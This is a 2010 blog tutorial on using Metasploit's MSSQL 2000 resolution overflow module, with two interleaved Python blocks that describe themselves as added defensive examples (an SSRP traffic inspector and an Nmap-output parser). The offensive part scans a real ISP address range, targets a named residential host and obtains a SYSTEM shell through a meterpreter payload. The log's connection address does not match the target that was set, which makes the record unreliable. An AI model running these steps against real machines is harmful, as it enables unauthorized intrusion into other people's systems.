Wednesday, July 21, 2010

Metasploit MSSQL Exploit

The following exploit is for Microsoft SQL Server.

Requirements
Metasploit framework
Nmap

Microsoft SQL Server listens on port 1433 and port 1434. Port 1433 is a TCP (Transmission Control Protocol) port, while 1434 is a UDP (User Datagram Protocol) port. For Nmap we will be using a SYN scan. A SYN scan is pretty much like playing ding dong ditch: a regular TCP connection requires a three-way handshake, whereas a SYN scan initiates the handshake, waits for a reply, then leaves. In Metasploit we will be using the exploit MSSQL 2000/MSDE Resolution Overflow. “This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).”
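The module description above tells a defender exactly what to watch for on the wire: the SQL Server Resolution Protocol (SSRP) on UDP/1434 is a tiny request/response protocol, and a legitimate 0x04 "look up this instance" request carries only a short instance name, so an oversized 0x04 datagram is the signature of the resolution-service overflow. The following Python is an added detection example, not code from the post or from Metasploit; the request-type constants are the SSRP ones, the 64-byte threshold is an assumed sanity limit, and the sample datagrams are constructed.

```python
"""Inspect UDP/1434 datagrams for malformed SQL Server Resolution Protocol
(SSRP) requests, in particular the oversized 0x04 request that triggers the
SQL Server 2000 resolution service overflow. Added defender-side example;
not code from the original post."""

from dataclasses import dataclass
from typing import Iterable, List, Tuple

# SSRP request types carried in the first byte of a UDP/1434 datagram.
SSRP_CLNT_BCAST_EX = 0x02    # enumerate every instance on the subnet
SSRP_CLNT_UCAST_EX = 0x03    # enumerate the instances on one host
SSRP_CLNT_UCAST_INST = 0x04  # look up one instance by name
SSRP_CLNT_UCAST_DAC = 0x0F   # dedicated admin connection port lookup

# A genuine CLNT_UCAST_INST is 0x04 plus a short NUL-terminated instance
# name (names are capped at 32 characters), so 64 bytes is a generous
# assumed ceiling; anything beyond it is the overflow pattern.
MAX_SANE_INST_REQUEST = 64


@dataclass
class SsrpVerdict:
    kind: str        # decoded request type
    length: int      # datagram length in bytes
    suspicious: bool
    reason: str


def inspect_ssrp(payload: bytes) -> SsrpVerdict:
    """Classify one UDP/1434 datagram and say whether it looks malformed."""
    if not payload:
        return SsrpVerdict("empty", 0, False, "empty datagram")
    req, body, n = payload[0], payload[1:], len(payload)

    if req == SSRP_CLNT_UCAST_INST:
        if n > MAX_SANE_INST_REQUEST:
            return SsrpVerdict("CLNT_UCAST_INST", n, True,
                               f"oversized instance request ({n} bytes); "
                               "resolution-service overflow pattern")
        name = body.split(b"\x00", 1)[0]
        if not name or not all(0x20 <= b < 0x7F for b in name):
            return SsrpVerdict("CLNT_UCAST_INST", n, True,
                               "empty or non-printable instance name")
        return SsrpVerdict("CLNT_UCAST_INST", n, False,
                           f"lookup of instance {name.decode()!r}")

    if req in (SSRP_CLNT_BCAST_EX, SSRP_CLNT_UCAST_EX):
        kind = "CLNT_BCAST_EX" if req == SSRP_CLNT_BCAST_EX else "CLNT_UCAST_EX"
        if body:  # these requests are exactly one byte long
            return SsrpVerdict(kind, n, True, "enumeration request with trailing data")
        return SsrpVerdict(kind, n, False, "instance enumeration")

    if req == SSRP_CLNT_UCAST_DAC:
        # 0x0F, protocol version 0x01, then a NUL-terminated instance name.
        if n > MAX_SANE_INST_REQUEST or len(body) < 2 or body[0] != 0x01:
            return SsrpVerdict("CLNT_UCAST_DAC", n, True, "malformed DAC port lookup")
        return SsrpVerdict("CLNT_UCAST_DAC", n, False, "DAC port lookup")

    return SsrpVerdict("unknown", n, True, f"unknown request type 0x{req:02x}")


def flag_datagrams(records: Iterable[Tuple[str, str, int, bytes]]
                   ) -> List[Tuple[str, str, SsrpVerdict]]:
    """records are (src_ip, dst_ip, dst_port, payload); only UDP/1434 traffic
    is inspected and only suspicious datagrams are returned."""
    hits = []
    for src, dst, dport, payload in records:
        if dport != 1434:
            continue
        verdict = inspect_ssrp(payload)
        if verdict.suspicious:
            hits.append((src, dst, verdict))
    return hits


# Constructed sample traffic, not a real capture.
SAMPLE = [
    ("10.0.0.5", "10.0.0.20", 1434, b"\x04MSSQLSERVER\x00"),     # normal lookup
    ("10.0.0.5", "10.0.0.255", 1434, b"\x02"),                   # subnet enumeration
    ("10.0.0.9", "10.0.0.20", 1434, b"\x04" + b"A" * 300),       # oversized request
    ("10.0.0.9", "10.0.0.20", 1433, b"\x04" + b"A" * 300),       # TCP/1433, not SSRP
]

if __name__ == "__main__":
    for src, dst, v in flag_datagrams(SAMPLE):
        print(f"{src} -> {dst}: {v.kind} {v.length} bytes: {v.reason}")
```

The same heuristic is what a network IDS rule for this bug boils down to (first byte 0x04, datagram size far above anything SSRP needs), and the practical mitigation is the one the module description implies: patch past SP3 and do not let UDP/1434 cross a network boundary at all.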

The first step is to find a vulnerable host. To do this we will be looking for a host that has port 1434 open. When I scan hosts with Nmap I always give it a range so I have a better chance of getting a hit. I also have the command write its output to a file so I have the results on record and they are easier to search.


#nmap -sU -p1434 -P0 -sS 24.151.0.0/16 >> /home/user/1434.txt

-sU  UDP scan
-p   What port to scan, in this case 1434
-P0  Don't ping hosts first
-sS  SYN scan; this is for TCP, but I'm in the habit of always using it
IP   The IP address, 24.151.0.0
/    Subnet suffix, in this case 16 = 255.255.0.0
>>   Where the output file is going to be located

The scan is going to take a while, since we are scanning 65,025 hosts. When the scan is done (or after 30 min), feel free to start searching the output file for anything that says open.

Interesting ports on 24-151-73-076.dhcp.nwtn.ct.charter.com (24.151.73.76):
PORT STATE SERVICE
1434/udp open ms-sql-s
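Searching the output file for "open" is where the caveat lives: Nmap reports a UDP port as open only when the service actually answered, while a port that never replied is printed as open|filtered, so a grep for "open" alone sweeps in a lot of hosts that have nothing listening. The following Python is an added example, not code from the post or from Nmap, that parses Nmap's normal-format output (both the older "Interesting ports on" and the current "Nmap scan report for" header wording) and lists only hosts with a confirmed 1434/udp listener, which is the inventory a defender wants when deciding which SQL Server resolution listeners to patch or firewall. The sample output it parses is constructed and uses documentation addresses.

```python
"""Pull hosts with 1434/udp open out of nmap's normal-format output.
Added example for inventorying exposed SQL Server resolution listeners;
not code from the original post. The sample output is constructed."""

import re
from typing import Iterator, List, NamedTuple


class PortHit(NamedTuple):
    host: str
    ip: str
    port: int
    proto: str
    state: str
    service: str


# Host header lines in nmap's normal output, old and current wording; the
# address in parentheses is present only when a hostname resolved.
HOST_RE = re.compile(
    r"^(?:Interesting ports on|Nmap scan report for) ([^\s:]+)"
    r"(?: \((\d{1,3}(?:\.\d{1,3}){3})\))?:?$")
# Port table rows such as "1434/udp open ms-sql-s"; the state column may be
# a compound like "open|filtered", which \S+ captures whole.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap(text: str) -> Iterator[PortHit]:
    """Yield one PortHit per port row, tagged with the host it belongs to."""
    host = ip = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            ip = m.group(2) or host
            continue
        m = PORT_RE.match(line)
        if m and host is not None:
            yield PortHit(host, ip, int(m.group(1)), m.group(2),
                          m.group(3), m.group(4))


def exposed_sql_resolvers(text: str, confirmed_only: bool = True) -> List[PortHit]:
    """Hosts with 1434/udp open. With confirmed_only=True only ports that
    answered the probe ("open") count; open|filtered means no reply at all."""
    wanted = {"open"} if confirmed_only else {"open", "open|filtered"}
    return [h for h in parse_nmap(text)
            if h.port == 1434 and h.proto == "udp" and h.state in wanted]


# Constructed nmap output covering the three states a UDP probe can produce.
SAMPLE = """\
Interesting ports on db1.example.test (192.0.2.10):
PORT     STATE         SERVICE
1434/udp open          ms-sql-s

Interesting ports on 192.0.2.11:
PORT     STATE         SERVICE
1434/udp open|filtered ms-sql-s

Nmap scan report for web.example.test (192.0.2.12)
PORT     STATE  SERVICE
1434/udp closed ms-sql-s
"""

if __name__ == "__main__":
    for hit in exposed_sql_resolvers(SAMPLE):
        print(f"{hit.ip} ({hit.host}) {hit.port}/{hit.proto} {hit.state} {hit.service}")
```

Run it over the real file written by the scan command (open it and pass the text to exposed_sql_resolvers) to get the confirmed list; pass confirmed_only=False to see the open|filtered hosts that need a follow-up probe before anyone concludes a service is there.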


So now that we have found a potential box for attack, we try to hack it. I will be using the Metasploit 2 console for this attack; Metasploit 3, the GUI and the web interface will all work as well.

#msfconsole
[*] Starting the Metasploit Framework...



+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf >use mssql2000_resolution
msf mssql2000_resolution >set PAYLOAD win32_bind_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf mssql2000_resolution(win32_bind_meterpreter) > show options

Exploit and Payload Options
===========================

Exploit:   Name      Default                                      Description
--------   --------  -------------------------------------------  ------------------------------------------
required   RHOST                                                  The target address
required   RPORT     1434                                         The target port

Payload:   Name      Default                                      Description
--------   --------  -------------------------------------------  ------------------------------------------
required   EXITFUNC  process                                      Exit technique: "process", "thread", "seh"
required   METDLL    /home/framework/data/meterpreter/metsrv.dll  The full path the meterpreter server dll
required   LPORT     4444                                         Listening port for bind shell

Target: MSQL 2000 / MSDE

msf mssql2000_resolution(win32_bind_meterpreter) >


msf mssql2000_resolution(win32_bind_meterpreter) > set RHOST 24.151.73.76
RHOST -> 24.151.73.76
msf mssql2000_resolution(win32_bind_meterpreter) > set LHOST 10.10.10.197
LHOST -> 10.10.10.197
msf mssql2000_resolution(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Trying target MSQL 2000 / MSDE with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Got connection from 10.10.10.197:2199 <-> 24.89.130.146:4444
[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed

meterpreter> use -m Process
loadlib: Loading library from 'ext227496.dll' on the remote machine
meterpreter>
loadlib: success.
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
execute: success, process id is 1576
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1...
meterpreter>
interact: Started interactive channel 1.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>


When you get to the shell you can run whoami and you will see that you are logged in as NT AUTHORITY\SYSTEM, which means you have Administrator rights. Now your imagination is the limit.
